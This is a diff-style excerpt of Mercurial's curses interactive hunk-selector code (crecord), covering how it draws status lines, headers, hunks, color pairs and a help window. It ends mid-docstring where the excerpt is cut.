1184 _headermessages[self.operation],
1188 b'-',
1185 b'-',
1189 _(b'[x]=selected **=collapsed'),
1186 _(b'[x]=selected **=collapsed'),
1190 _(b'c: confirm'),
1187 _(b'c: confirm'),
1191 _(b'q: abort'),
1188 _(b'q: abort'),
1192 _(b'arrow keys: move/expand/collapse'),
1189 _(b'arrow keys: move/expand/collapse'),
1193 selectedlabel,
1190 selectedlabel,
1194 _(b'?: help'),
1191 _(b'?: help'),
1195 ]
1192 ]
1196 return segments
1193 return segments
1197
1194
1198 def _getstatuslines(self):
1195 def _getstatuslines(self):
1199 """() -> [str]. return short help used in the top status window"""
1196 """() -> [str]. return short help used in the top status window"""
1200 if self.errorstr is not None:
1197 if self.errorstr is not None:
1201 lines = [self.errorstr, _(b'Press any key to continue')]
1198 lines = [self.errorstr, _(b'Press any key to continue')]
1202 else:
1199 else:
1203 # wrap segments to lines
1200 # wrap segments to lines
1204 segments = self._getstatuslinesegments()
1201 segments = self._getstatuslinesegments()
1205 width = self.xscreensize
1202 width = self.xscreensize
1206 lines = []
1203 lines = []
1207 lastwidth = width
1204 lastwidth = width
1208 for s in segments:
1205 for s in segments:
1209 w = encoding.colwidth(s)
1206 w = encoding.colwidth(s)
1210 sep = b' ' * (1 + (s and s[0] not in b'-['))
1207 sep = b' ' * (1 + (s and s[0] not in b'-['))
1211 if lastwidth + w + len(sep) >= width:
1208 if lastwidth + w + len(sep) >= width:
1212 lines.append(s)
1209 lines.append(s)
1213 lastwidth = w
1210 lastwidth = w
1214 else:
1211 else:
1215 lines[-1] += sep + s
1212 lines[-1] += sep + s
1216 lastwidth += w + len(sep)
1213 lastwidth += w + len(sep)
1217 if len(lines) != self.numstatuslines:
1214 if len(lines) != self.numstatuslines:
1218 self.numstatuslines = len(lines)
1215 self.numstatuslines = len(lines)
1219 self.statuswin.resize(self.numstatuslines, self.xscreensize)
1216 self.statuswin.resize(self.numstatuslines, self.xscreensize)
1220 return [stringutil.ellipsis(l, self.xscreensize - 1) for l in lines]
1217 return [stringutil.ellipsis(l, self.xscreensize - 1) for l in lines]
1221
1218
1222 def updatescreen(self):
1219 def updatescreen(self):
1223 self.statuswin.erase()
1220 self.statuswin.erase()
1224 self.chunkpad.erase()
1221 self.chunkpad.erase()
1225
1222
1226 printstring = self.printstring
1223 printstring = self.printstring
1227
1224
1228 # print out the status lines at the top
1225 # print out the status lines at the top
1229 try:
1226 try:
1230 for line in self._getstatuslines():
1227 for line in self._getstatuslines():
1231 printstring(self.statuswin, line, pairname=b"legend")
1228 printstring(self.statuswin, line, pairname=b"legend")
1232 self.statuswin.refresh()
1229 self.statuswin.refresh()
1233 except curses.error:
1230 except curses.error:
1234 pass
1231 pass
1235 if self.errorstr is not None:
1232 if self.errorstr is not None:
1236 return
1233 return
1237
1234
1238 # print out the patch in the remaining part of the window
1235 # print out the patch in the remaining part of the window
1239 try:
1236 try:
1240 self.printitem()
1237 self.printitem()
1241 self.updatescroll()
1238 self.updatescroll()
1242 self.chunkpad.refresh(
1239 self.chunkpad.refresh(
1243 self.firstlineofpadtoprint,
1240 self.firstlineofpadtoprint,
1244 0,
1241 0,
1245 self.numstatuslines,
1242 self.numstatuslines,
1246 0,
1243 0,
1247 self.yscreensize - self.numstatuslines,
1244 self.yscreensize - self.numstatuslines,
1248 self.xscreensize,
1245 self.xscreensize,
1249 )
1246 )
1250 except curses.error:
1247 except curses.error:
1251 pass
1248 pass
1252
1249
1253 def getstatusprefixstring(self, item):
1250 def getstatusprefixstring(self, item):
1254 """
1251 """
1255 create a string to prefix a line with which indicates whether 'item'
1252 create a string to prefix a line with which indicates whether 'item'
1256 is applied and/or folded.
1253 is applied and/or folded.
1257 """
1254 """
1258
1255
1259 # create checkbox string
1256 # create checkbox string
1260 if item.applied:
1257 if item.applied:
1261 if not isinstance(item, uihunkline) and item.partial:
1258 if not isinstance(item, uihunkline) and item.partial:
1262 checkbox = b"[~]"
1259 checkbox = b"[~]"
1263 else:
1260 else:
1264 checkbox = b"[x]"
1261 checkbox = b"[x]"
1265 else:
1262 else:
1266 checkbox = b"[ ]"
1263 checkbox = b"[ ]"
1267
1264
1268 try:
1265 try:
1269 if item.folded:
1266 if item.folded:
1270 checkbox += b"**"
1267 checkbox += b"**"
1271 if isinstance(item, uiheader):
1268 if isinstance(item, uiheader):
1272 # one of "m", "a", or "d" (modified, added, deleted)
1269 # one of "m", "a", or "d" (modified, added, deleted)
1273 filestatus = item.changetype
1270 filestatus = item.changetype
1274
1271
1275 checkbox += filestatus + b" "
1272 checkbox += filestatus + b" "
1276 else:
1273 else:
1277 checkbox += b" "
1274 checkbox += b" "
1278 if isinstance(item, uiheader):
1275 if isinstance(item, uiheader):
1279 # add two more spaces for headers
1276 # add two more spaces for headers
1280 checkbox += b" "
1277 checkbox += b" "
1281 except AttributeError: # not foldable
1278 except AttributeError: # not foldable
1282 checkbox += b" "
1279 checkbox += b" "
1283
1280
1284 return checkbox
1281 return checkbox
1285
1282
1286 def printheader(
1283 def printheader(
1287 self, header, selected=False, towin=True, ignorefolding=False
1284 self, header, selected=False, towin=True, ignorefolding=False
1288 ):
1285 ):
1289 """
1286 """
1290 print the header to the pad. if countlines is True, don't print
1287 print the header to the pad. if countlines is True, don't print
1291 anything, but just count the number of lines which would be printed.
1288 anything, but just count the number of lines which would be printed.
1292 """
1289 """
1293
1290
1294 outstr = b""
1291 outstr = b""
1295 text = header.prettystr()
1292 text = header.prettystr()
1296 chunkindex = self.chunklist.index(header)
1293 chunkindex = self.chunklist.index(header)
1297
1294
1298 if chunkindex != 0 and not header.folded:
1295 if chunkindex != 0 and not header.folded:
1299 # add separating line before headers
1296 # add separating line before headers
1300 outstr += self.printstring(
1297 outstr += self.printstring(
1301 self.chunkpad, b'_' * self.xscreensize, towin=towin, align=False
1298 self.chunkpad, b'_' * self.xscreensize, towin=towin, align=False
1302 )
1299 )
1303 # select color-pair based on if the header is selected
1300 # select color-pair based on if the header is selected
1304 colorpair = self.getcolorpair(
1301 colorpair = self.getcolorpair(
1305 name=selected and b"selected" or b"normal", attrlist=[curses.A_BOLD]
1302 name=selected and b"selected" or b"normal", attrlist=[curses.A_BOLD]
1306 )
1303 )
1307
1304
1308 # print out each line of the chunk, expanding it to screen width
1305 # print out each line of the chunk, expanding it to screen width
1309
1306
1310 # number of characters to indent lines on this level by
1307 # number of characters to indent lines on this level by
1311 indentnumchars = 0
1308 indentnumchars = 0
1312 checkbox = self.getstatusprefixstring(header)
1309 checkbox = self.getstatusprefixstring(header)
1313 if not header.folded or ignorefolding:
1310 if not header.folded or ignorefolding:
1314 textlist = text.split(b"\n")
1311 textlist = text.split(b"\n")
1315 linestr = checkbox + textlist[0]
1312 linestr = checkbox + textlist[0]
1316 else:
1313 else:
1317 linestr = checkbox + header.filename()
1314 linestr = checkbox + header.filename()
1318 outstr += self.printstring(
1315 outstr += self.printstring(
1319 self.chunkpad, linestr, pair=colorpair, towin=towin
1316 self.chunkpad, linestr, pair=colorpair, towin=towin
1320 )
1317 )
1321 if not header.folded or ignorefolding:
1318 if not header.folded or ignorefolding:
1322 if len(textlist) > 1:
1319 if len(textlist) > 1:
1323 for line in textlist[1:]:
1320 for line in textlist[1:]:
1324 linestr = b" " * (indentnumchars + len(checkbox)) + line
1321 linestr = b" " * (indentnumchars + len(checkbox)) + line
1325 outstr += self.printstring(
1322 outstr += self.printstring(
1326 self.chunkpad, linestr, pair=colorpair, towin=towin
1323 self.chunkpad, linestr, pair=colorpair, towin=towin
1327 )
1324 )
1328
1325
1329 return outstr
1326 return outstr
1330
1327
1331 def printhunklinesbefore(
1328 def printhunklinesbefore(
1332 self, hunk, selected=False, towin=True, ignorefolding=False
1329 self, hunk, selected=False, towin=True, ignorefolding=False
1333 ):
1330 ):
1334 """includes start/end line indicator"""
1331 """includes start/end line indicator"""
1335 outstr = b""
1332 outstr = b""
1336 # where hunk is in list of siblings
1333 # where hunk is in list of siblings
1337 hunkindex = hunk.header.hunks.index(hunk)
1334 hunkindex = hunk.header.hunks.index(hunk)
1338
1335
1339 if hunkindex != 0:
1336 if hunkindex != 0:
1340 # add separating line before headers
1337 # add separating line before headers
1341 outstr += self.printstring(
1338 outstr += self.printstring(
1342 self.chunkpad, b' ' * self.xscreensize, towin=towin, align=False
1339 self.chunkpad, b' ' * self.xscreensize, towin=towin, align=False
1343 )
1340 )
1344
1341
1345 colorpair = self.getcolorpair(
1342 colorpair = self.getcolorpair(
1346 name=selected and b"selected" or b"normal", attrlist=[curses.A_BOLD]
1343 name=selected and b"selected" or b"normal", attrlist=[curses.A_BOLD]
1347 )
1344 )
1348
1345
1349 # print out from-to line with checkbox
1346 # print out from-to line with checkbox
1350 checkbox = self.getstatusprefixstring(hunk)
1347 checkbox = self.getstatusprefixstring(hunk)
1351
1348
1352 lineprefix = b" " * self.hunkindentnumchars + checkbox
1349 lineprefix = b" " * self.hunkindentnumchars + checkbox
1353 frtoline = b" " + hunk.getfromtoline().strip(b"\n")
1350 frtoline = b" " + hunk.getfromtoline().strip(b"\n")
1354
1351
1355 outstr += self.printstring(
1352 outstr += self.printstring(
1356 self.chunkpad, lineprefix, towin=towin, align=False
1353 self.chunkpad, lineprefix, towin=towin, align=False
1357 ) # add uncolored checkbox/indent
1354 ) # add uncolored checkbox/indent
1358 outstr += self.printstring(
1355 outstr += self.printstring(
1359 self.chunkpad, frtoline, pair=colorpair, towin=towin
1356 self.chunkpad, frtoline, pair=colorpair, towin=towin
1360 )
1357 )
1361
1358
1362 if hunk.folded and not ignorefolding:
1359 if hunk.folded and not ignorefolding:
1363 # skip remainder of output
1360 # skip remainder of output
1364 return outstr
1361 return outstr
1365
1362
1366 # print out lines of the chunk preceeding changed-lines
1363 # print out lines of the chunk preceeding changed-lines
1367 for line in hunk.before:
1364 for line in hunk.before:
1368 linestr = (
1365 linestr = (
1369 b" " * (self.hunklineindentnumchars + len(checkbox)) + line
1366 b" " * (self.hunklineindentnumchars + len(checkbox)) + line
1370 )
1367 )
1371 outstr += self.printstring(self.chunkpad, linestr, towin=towin)
1368 outstr += self.printstring(self.chunkpad, linestr, towin=towin)
1372
1369
1373 return outstr
1370 return outstr
1374
1371
1375 def printhunklinesafter(self, hunk, towin=True, ignorefolding=False):
1372 def printhunklinesafter(self, hunk, towin=True, ignorefolding=False):
1376 outstr = b""
1373 outstr = b""
1377 if hunk.folded and not ignorefolding:
1374 if hunk.folded and not ignorefolding:
1378 return outstr
1375 return outstr
1379
1376
1380 # a bit superfluous, but to avoid hard-coding indent amount
1377 # a bit superfluous, but to avoid hard-coding indent amount
1381 checkbox = self.getstatusprefixstring(hunk)
1378 checkbox = self.getstatusprefixstring(hunk)
1382 for line in hunk.after:
1379 for line in hunk.after:
1383 linestr = (
1380 linestr = (
1384 b" " * (self.hunklineindentnumchars + len(checkbox)) + line
1381 b" " * (self.hunklineindentnumchars + len(checkbox)) + line
1385 )
1382 )
1386 outstr += self.printstring(self.chunkpad, linestr, towin=towin)
1383 outstr += self.printstring(self.chunkpad, linestr, towin=towin)
1387
1384
1388 return outstr
1385 return outstr
1389
1386
1390 def printhunkchangedline(self, hunkline, selected=False, towin=True):
1387 def printhunkchangedline(self, hunkline, selected=False, towin=True):
1391 outstr = b""
1388 outstr = b""
1392 checkbox = self.getstatusprefixstring(hunkline)
1389 checkbox = self.getstatusprefixstring(hunkline)
1393
1390
1394 linestr = hunkline.prettystr().strip(b"\n")
1391 linestr = hunkline.prettystr().strip(b"\n")
1395
1392
1396 # select color-pair based on whether line is an addition/removal
1393 # select color-pair based on whether line is an addition/removal
1397 if selected:
1394 if selected:
1398 colorpair = self.getcolorpair(name=b"selected")
1395 colorpair = self.getcolorpair(name=b"selected")
1399 elif linestr.startswith(b"+"):
1396 elif linestr.startswith(b"+"):
1400 colorpair = self.getcolorpair(name=b"addition")
1397 colorpair = self.getcolorpair(name=b"addition")
1401 elif linestr.startswith(b"-"):
1398 elif linestr.startswith(b"-"):
1402 colorpair = self.getcolorpair(name=b"deletion")
1399 colorpair = self.getcolorpair(name=b"deletion")
1403 elif linestr.startswith(b"\\"):
1400 elif linestr.startswith(b"\\"):
1404 colorpair = self.getcolorpair(name=b"normal")
1401 colorpair = self.getcolorpair(name=b"normal")
1405
1402
1406 lineprefix = b" " * self.hunklineindentnumchars + checkbox
1403 lineprefix = b" " * self.hunklineindentnumchars + checkbox
1407 outstr += self.printstring(
1404 outstr += self.printstring(
1408 self.chunkpad, lineprefix, towin=towin, align=False
1405 self.chunkpad, lineprefix, towin=towin, align=False
1409 ) # add uncolored checkbox/indent
1406 ) # add uncolored checkbox/indent
1410 outstr += self.printstring(
1407 outstr += self.printstring(
1411 self.chunkpad, linestr, pair=colorpair, towin=towin, showwhtspc=True
1408 self.chunkpad, linestr, pair=colorpair, towin=towin, showwhtspc=True
1412 )
1409 )
1413 return outstr
1410 return outstr
1414
1411
1415 def printitem(
1412 def printitem(
1416 self, item=None, ignorefolding=False, recursechildren=True, towin=True
1413 self, item=None, ignorefolding=False, recursechildren=True, towin=True
1417 ):
1414 ):
1418 """
1415 """
1419 use __printitem() to print the the specified item.applied.
1416 use __printitem() to print the the specified item.applied.
1420 if item is not specified, then print the entire patch.
1417 if item is not specified, then print the entire patch.
1421 (hiding folded elements, etc. -- see __printitem() docstring)
1418 (hiding folded elements, etc. -- see __printitem() docstring)
1422 """
1419 """
1423
1420
1424 if item is None:
1421 if item is None:
1425 item = self.headerlist
1422 item = self.headerlist
1426 if recursechildren:
1423 if recursechildren:
1427 self.linesprintedtopadsofar = 0
1424 self.linesprintedtopadsofar = 0
1428
1425
1429 outstr = []
1426 outstr = []
1430 self.__printitem(
1427 self.__printitem(
1431 item, ignorefolding, recursechildren, outstr, towin=towin
1428 item, ignorefolding, recursechildren, outstr, towin=towin
1432 )
1429 )
1433 return b''.join(outstr)
1430 return b''.join(outstr)
1434
1431
1435 def outofdisplayedarea(self):
1432 def outofdisplayedarea(self):
1436 y, _ = self.chunkpad.getyx() # cursor location
1433 y, _ = self.chunkpad.getyx() # cursor location
1437 # * 2 here works but an optimization would be the max number of
1434 # * 2 here works but an optimization would be the max number of
1438 # consecutive non selectable lines
1435 # consecutive non selectable lines
1439 # i.e the max number of context line for any hunk in the patch
1436 # i.e the max number of context line for any hunk in the patch
1440 miny = min(0, self.firstlineofpadtoprint - self.yscreensize)
1437 miny = min(0, self.firstlineofpadtoprint - self.yscreensize)
1441 maxy = self.firstlineofpadtoprint + self.yscreensize * 2
1438 maxy = self.firstlineofpadtoprint + self.yscreensize * 2
1442 return y < miny or y > maxy
1439 return y < miny or y > maxy
1443
1440
1444 def handleselection(self, item, recursechildren):
1441 def handleselection(self, item, recursechildren):
1445 selected = item is self.currentselecteditem
1442 selected = item is self.currentselecteditem
1446 if selected and recursechildren:
1443 if selected and recursechildren:
1447 # assumes line numbering starting from line 0
1444 # assumes line numbering starting from line 0
1448 self.selecteditemstartline = self.linesprintedtopadsofar
1445 self.selecteditemstartline = self.linesprintedtopadsofar
1449 selecteditemlines = self.getnumlinesdisplayed(
1446 selecteditemlines = self.getnumlinesdisplayed(
1450 item, recursechildren=False
1447 item, recursechildren=False
1451 )
1448 )
1452 self.selecteditemendline = (
1449 self.selecteditemendline = (
1453 self.selecteditemstartline + selecteditemlines - 1
1450 self.selecteditemstartline + selecteditemlines - 1
1454 )
1451 )
1455 return selected
1452 return selected
1456
1453
1457 def __printitem(
1454 def __printitem(
1458 self, item, ignorefolding, recursechildren, outstr, towin=True
1455 self, item, ignorefolding, recursechildren, outstr, towin=True
1459 ):
1456 ):
1460 """
1457 """
1461 recursive method for printing out patch/header/hunk/hunk-line data to
1458 recursive method for printing out patch/header/hunk/hunk-line data to
1462 screen. also returns a string with all of the content of the displayed
1459 screen. also returns a string with all of the content of the displayed
1463 patch (not including coloring, etc.).
1460 patch (not including coloring, etc.).
1464
1461
1465 if ignorefolding is True, then folded items are printed out.
1462 if ignorefolding is True, then folded items are printed out.
1466
1463
1467 if recursechildren is False, then only print the item without its
1464 if recursechildren is False, then only print the item without its
1468 child items.
1465 child items.
1469 """
1466 """
1470
1467
1471 if towin and self.outofdisplayedarea():
1468 if towin and self.outofdisplayedarea():
1472 return
1469 return
1473
1470
1474 selected = self.handleselection(item, recursechildren)
1471 selected = self.handleselection(item, recursechildren)
1475
1472
1476 # patch object is a list of headers
1473 # patch object is a list of headers
1477 if isinstance(item, patch):
1474 if isinstance(item, patch):
1478 if recursechildren:
1475 if recursechildren:
1479 for hdr in item:
1476 for hdr in item:
1480 self.__printitem(
1477 self.__printitem(
1481 hdr, ignorefolding, recursechildren, outstr, towin
1478 hdr, ignorefolding, recursechildren, outstr, towin
1482 )
1479 )
1483 # todo: eliminate all isinstance() calls
1480 # todo: eliminate all isinstance() calls
1484 if isinstance(item, uiheader):
1481 if isinstance(item, uiheader):
1485 outstr.append(
1482 outstr.append(
1486 self.printheader(
1483 self.printheader(
1487 item, selected, towin=towin, ignorefolding=ignorefolding
1484 item, selected, towin=towin, ignorefolding=ignorefolding
1488 )
1485 )
1489 )
1486 )
1490 if recursechildren:
1487 if recursechildren:
1491 for hnk in item.hunks:
1488 for hnk in item.hunks:
1492 self.__printitem(
1489 self.__printitem(
1493 hnk, ignorefolding, recursechildren, outstr, towin
1490 hnk, ignorefolding, recursechildren, outstr, towin
1494 )
1491 )
1495 elif isinstance(item, uihunk) and (
1492 elif isinstance(item, uihunk) and (
1496 (not item.header.folded) or ignorefolding
1493 (not item.header.folded) or ignorefolding
1497 ):
1494 ):
1498 # print the hunk data which comes before the changed-lines
1495 # print the hunk data which comes before the changed-lines
1499 outstr.append(
1496 outstr.append(
1500 self.printhunklinesbefore(
1497 self.printhunklinesbefore(
1501 item, selected, towin=towin, ignorefolding=ignorefolding
1498 item, selected, towin=towin, ignorefolding=ignorefolding
1502 )
1499 )
1503 )
1500 )
1504 if recursechildren:
1501 if recursechildren:
1505 for l in item.changedlines:
1502 for l in item.changedlines:
1506 self.__printitem(
1503 self.__printitem(
1507 l, ignorefolding, recursechildren, outstr, towin
1504 l, ignorefolding, recursechildren, outstr, towin
1508 )
1505 )
1509 outstr.append(
1506 outstr.append(
1510 self.printhunklinesafter(
1507 self.printhunklinesafter(
1511 item, towin=towin, ignorefolding=ignorefolding
1508 item, towin=towin, ignorefolding=ignorefolding
1512 )
1509 )
1513 )
1510 )
1514 elif isinstance(item, uihunkline) and (
1511 elif isinstance(item, uihunkline) and (
1515 (not item.hunk.folded) or ignorefolding
1512 (not item.hunk.folded) or ignorefolding
1516 ):
1513 ):
1517 outstr.append(
1514 outstr.append(
1518 self.printhunkchangedline(item, selected, towin=towin)
1515 self.printhunkchangedline(item, selected, towin=towin)
1519 )
1516 )
1520
1517
1521 return outstr
1518 return outstr
1522
1519
1523 def getnumlinesdisplayed(
1520 def getnumlinesdisplayed(
1524 self, item=None, ignorefolding=False, recursechildren=True
1521 self, item=None, ignorefolding=False, recursechildren=True
1525 ):
1522 ):
1526 """
1523 """
1527 return the number of lines which would be displayed if the item were
1524 return the number of lines which would be displayed if the item were
1528 to be printed to the display. the item will not be printed to the
1525 to be printed to the display. the item will not be printed to the
1529 display (pad).
1526 display (pad).
1530 if no item is given, assume the entire patch.
1527 if no item is given, assume the entire patch.
1531 if ignorefolding is True, folded items will be unfolded when counting
1528 if ignorefolding is True, folded items will be unfolded when counting
1532 the number of lines.
1529 the number of lines.
1533 """
1530 """
1534
1531
1535 # temporarily disable printing to windows by printstring
1532 # temporarily disable printing to windows by printstring
1536 patchdisplaystring = self.printitem(
1533 patchdisplaystring = self.printitem(
1537 item, ignorefolding, recursechildren, towin=False
1534 item, ignorefolding, recursechildren, towin=False
1538 )
1535 )
1539 numlines = len(patchdisplaystring) // self.xscreensize
1536 numlines = len(patchdisplaystring) // self.xscreensize
1540 return numlines
1537 return numlines
1541
1538
1542 def sigwinchhandler(self, n, frame):
1539 def sigwinchhandler(self, n, frame):
1543 """handle window resizing"""
1540 """handle window resizing"""
1544 try:
1541 try:
1545 curses.endwin()
1542 curses.endwin()
1546 self.xscreensize, self.yscreensize = scmutil.termsize(self.ui)
1543 self.xscreensize, self.yscreensize = scmutil.termsize(self.ui)
1547 self.statuswin.resize(self.numstatuslines, self.xscreensize)
1544 self.statuswin.resize(self.numstatuslines, self.xscreensize)
1548 self.numpadlines = self.getnumlinesdisplayed(ignorefolding=True) + 1
1545 self.numpadlines = self.getnumlinesdisplayed(ignorefolding=True) + 1
1549 self.chunkpad = curses.newpad(self.numpadlines, self.xscreensize)
1546 self.chunkpad = curses.newpad(self.numpadlines, self.xscreensize)
1550 except curses.error:
1547 except curses.error:
1551 pass
1548 pass
1552
1549
1553 def getcolorpair(
1550 def getcolorpair(
1554 self, fgcolor=None, bgcolor=None, name=None, attrlist=None
1551 self, fgcolor=None, bgcolor=None, name=None, attrlist=None
1555 ):
1552 ):
1556 """
1553 """
1557 get a curses color pair, adding it to self.colorpairs if it is not
1554 get a curses color pair, adding it to self.colorpairs if it is not
1558 already defined. an optional string, name, can be passed as a shortcut
1555 already defined. an optional string, name, can be passed as a shortcut
1559 for referring to the color-pair. by default, if no arguments are
1556 for referring to the color-pair. by default, if no arguments are
1560 specified, the white foreground / black background color-pair is
1557 specified, the white foreground / black background color-pair is
1561 returned.
1558 returned.
1562
1559
1563 it is expected that this function will be used exclusively for
1560 it is expected that this function will be used exclusively for
1564 initializing color pairs, and not curses.init_pair().
1561 initializing color pairs, and not curses.init_pair().
1565
1562
1566 attrlist is used to 'flavor' the returned color-pair. this information
1563 attrlist is used to 'flavor' the returned color-pair. this information
1567 is not stored in self.colorpairs. it contains attribute values like
1564 is not stored in self.colorpairs. it contains attribute values like
1568 curses.A_BOLD.
1565 curses.A_BOLD.
1569 """
1566 """
1570
1567
1571 if (name is not None) and name in self.colorpairnames:
1568 if (name is not None) and name in self.colorpairnames:
1572 # then get the associated color pair and return it
1569 # then get the associated color pair and return it
1573 colorpair = self.colorpairnames[name]
1570 colorpair = self.colorpairnames[name]
1574 else:
1571 else:
1575 if fgcolor is None:
1572 if fgcolor is None:
1576 fgcolor = -1
1573 fgcolor = -1
1577 if bgcolor is None:
1574 if bgcolor is None:
1578 bgcolor = -1
1575 bgcolor = -1
1579 if (fgcolor, bgcolor) in self.colorpairs:
1576 if (fgcolor, bgcolor) in self.colorpairs:
1580 colorpair = self.colorpairs[(fgcolor, bgcolor)]
1577 colorpair = self.colorpairs[(fgcolor, bgcolor)]
1581 else:
1578 else:
1582 pairindex = len(self.colorpairs) + 1
1579 pairindex = len(self.colorpairs) + 1
1583 if self.usecolor:
1580 if self.usecolor:
1584 curses.init_pair(pairindex, fgcolor, bgcolor)
1581 curses.init_pair(pairindex, fgcolor, bgcolor)
1585 colorpair = self.colorpairs[
1582 colorpair = self.colorpairs[
1586 (fgcolor, bgcolor)
1583 (fgcolor, bgcolor)
1587 ] = curses.color_pair(pairindex)
1584 ] = curses.color_pair(pairindex)
1588 if name is not None:
1585 if name is not None:
1589 self.colorpairnames[name] = curses.color_pair(pairindex)
1586 self.colorpairnames[name] = curses.color_pair(pairindex)
1590 else:
1587 else:
1591 cval = 0
1588 cval = 0
1592 if name is not None:
1589 if name is not None:
1593 if name == b'selected':
1590 if name == b'selected':
1594 cval = curses.A_REVERSE
1591 cval = curses.A_REVERSE
1595 self.colorpairnames[name] = cval
1592 self.colorpairnames[name] = cval
1596 colorpair = self.colorpairs[(fgcolor, bgcolor)] = cval
1593 colorpair = self.colorpairs[(fgcolor, bgcolor)] = cval
1597
1594
1598 # add attributes if possible
1595 # add attributes if possible
1599 if attrlist is None:
1596 if attrlist is None:
1600 attrlist = []
1597 attrlist = []
1601 if colorpair < 256:
1598 if colorpair < 256:
1602 # then it is safe to apply all attributes
1599 # then it is safe to apply all attributes
1603 for textattr in attrlist:
1600 for textattr in attrlist:
1604 colorpair |= textattr
1601 colorpair |= textattr
1605 else:
1602 else:
1606 # just apply a select few (safe?) attributes
1603 # just apply a select few (safe?) attributes
1607 for textattrib in (curses.A_UNDERLINE, curses.A_BOLD):
1604 for textattrib in (curses.A_UNDERLINE, curses.A_BOLD):
1608 if textattrib in attrlist:
1605 if textattrib in attrlist:
1609 colorpair |= textattrib
1606 colorpair |= textattrib
1610 return colorpair
1607 return colorpair
1611
1608
1612 def initcolorpair(self, *args, **kwargs):
1609 def initcolorpair(self, *args, **kwargs):
1613 """same as getcolorpair."""
1610 """same as getcolorpair."""
1614 self.getcolorpair(*args, **kwargs)
1611 self.getcolorpair(*args, **kwargs)
1615
1612
1616 def helpwindow(self):
1613 def helpwindow(self):
1617 """print a help window to the screen. exit after any keypress."""
1614 """print a help window to the screen. exit after any keypress."""
1618 helptext = _(
1615 helptext = _(
1619 """ [press any key to return to the patch-display]
1616 """ [press any key to return to the patch-display]
1620
1617
1621 The curses hunk selector allows you to interactively choose among the
1618 The curses hunk selector allows you to interactively choose among the
1622 changes you have made, and confirm only those changes you select for
1619 changes you have made, and confirm only those changes you select for
1623 further processing by the command you are running (such as commit,
1620 further processing by the command you are running (such as commit,
1624 shelve, or revert). After confirming the selected changes, the
1621 shelve, or revert). After confirming the selected changes, the
1625 unselected changes are still present in your working copy, so you can
1622 unselected changes are still present in your working copy, so you can
1626 use the hunk selector multiple times to split large changes into
1623 use the hunk selector multiple times to split large changes into
1627 smaller changesets. the following are valid keystrokes:
1624 smaller changesets. the following are valid keystrokes:
1628
1625
1629 x [space] : (un-)select item ([~]/[x] = partly/fully applied)
1626 x [space] : (un-)select item ([~]/[x] = partly/fully applied)
1630 [enter] : (un-)select item and go to next item of same type
1627 [enter] : (un-)select item and go to next item of same type
1631 A : (un-)select all items
1628 A : (un-)select all items
1632 X : (un-)select all items between current and most-recent
1629 X : (un-)select all items between current and most-recent
1633 up/down-arrow [k/j] : go to previous/next unfolded item
1630 up/down-arrow [k/j] : go to previous/next unfolded item
1634 pgup/pgdn [K/J] : go to previous/next item of same type
1631 pgup/pgdn [K/J] : go to previous/next item of same type
1635 right/left-arrow [l/h] : go to child item / parent item
1632 right/left-arrow [l/h] : go to child item / parent item
1636 shift-left-arrow [H] : go to parent header / fold selected header
1633 shift-left-arrow [H] : go to parent header / fold selected header
1637 g : go to the top
1634 g : go to the top
1638 G : go to the bottom
1635 G : go to the bottom
1639 f : fold / unfold item, hiding/revealing its children
1636 f : fold / unfold item, hiding/revealing its children
1640 F : fold / unfold parent item and all of its ancestors
1637 F : fold / unfold parent item and all of its ancestors
1641 ctrl-l : scroll the selected line to the top of the screen
1638 ctrl-l : scroll the selected line to the top of the screen
1642 m : edit / resume editing the commit message
1639 m : edit / resume editing the commit message
1643 e : edit the currently selected hunk
1640 e : edit the currently selected hunk
1644 a : toggle all selections
1641 a : toggle all selections
1645 c : confirm selected changes
1642 c : confirm selected changes
1646 r : review/edit and confirm selected changes
1643 r : review/edit and confirm selected changes
1647 q : quit without confirming (no changes will be made)
1644 q : quit without confirming (no changes will be made)
1648 ? : help (what you're currently reading)"""
1645 ? : help (what you're currently reading)"""
1649 )
1646 )
1650
1647
1651 helpwin = curses.newwin(self.yscreensize, 0, 0, 0)
1648 helpwin = curses.newwin(self.yscreensize, 0, 0, 0)
1652 helplines = helptext.split(b"\n")
1649 helplines = helptext.split(b"\n")
1653 helplines = helplines + [b" "] * (
1650 helplines = helplines + [b" "] * (
1654 self.yscreensize - self.numstatuslines - len(helplines) - 1
1651 self.yscreensize - self.numstatuslines - len(helplines) - 1
1655 )
1652 )
1656 try:
1653 try:
1657 for line in helplines:
1654 for line in helplines:
1658 self.printstring(helpwin, line, pairname=b"legend")
1655 self.printstring(helpwin, line, pairname=b"legend")
1659 except curses.error:
1656 except curses.error:
1660 pass
1657 pass
1661 helpwin.refresh()
1658 helpwin.refresh()
1662 try:
1659 try:
1663 with self.ui.timeblockedsection(b'crecord'):
1660 with self.ui.timeblockedsection(b'crecord'):
1664 helpwin.getkey()
1661 helpwin.getkey()
1665 except curses.error:
1662 except curses.error:
1666 pass
1663 pass
1667
1664
1668 def commitMessageWindow(self):
1665 def commitMessageWindow(self):
1669 """Create a temporary commit message editing window on the screen."""
1666 """Create a temporary commit message editing window on the screen."""
1670
1667
1671 curses.raw()
1668 curses.raw()
1672 curses.def_prog_mode()
1669 curses.def_prog_mode()
1673 curses.endwin()
1670 curses.endwin()
1674 self.commenttext = self.ui.edit(self.commenttext, self.ui.username())
1671 self.commenttext = self.ui.edit(self.commenttext, self.ui.username())
1675 curses.cbreak()
1672 curses.cbreak()
1676 self.stdscr.refresh()
1673 self.stdscr.refresh()
1677 self.stdscr.keypad(1) # allow arrow-keys to continue to function
1674 self.stdscr.keypad(1) # allow arrow-keys to continue to function
1678
1675
1679 def handlefirstlineevent(self):
1676 def handlefirstlineevent(self):
1680 """
1677 """
1681 Handle 'g' to navigate to the top most file in the ncurses window.
1678 Handle 'g' to navigate to the top most file in the ncurses window.
1682 """
1679 """
1683 self.currentselecteditem = self.headerlist[0]
1680 self.currentselecteditem = self.headerlist[0]
1684 currentitem = self.currentselecteditem
1681 currentitem = self.currentselecteditem
1685 # select the parent item recursively until we're at a header
1682 # select the parent item recursively until we're at a header
1686 while True:
1683 while True:
1687 nextitem = currentitem.parentitem()
1684 nextitem = currentitem.parentitem()
1688 if nextitem is None:
1685 if nextitem is None:
1689 break
1686 break
1690 else:
1687 else:
1691 currentitem = nextitem
1688 currentitem = nextitem
1692
1689
1693 self.currentselecteditem = currentitem
1690 self.currentselecteditem = currentitem
1694
1691
1695 def handlelastlineevent(self):
1692 def handlelastlineevent(self):
1696 """
1693 """
1697 Handle 'G' to navigate to the bottom most file/hunk/line depending
1694 Handle 'G' to navigate to the bottom most file/hunk/line depending
1698 on the whether the fold is active or not.
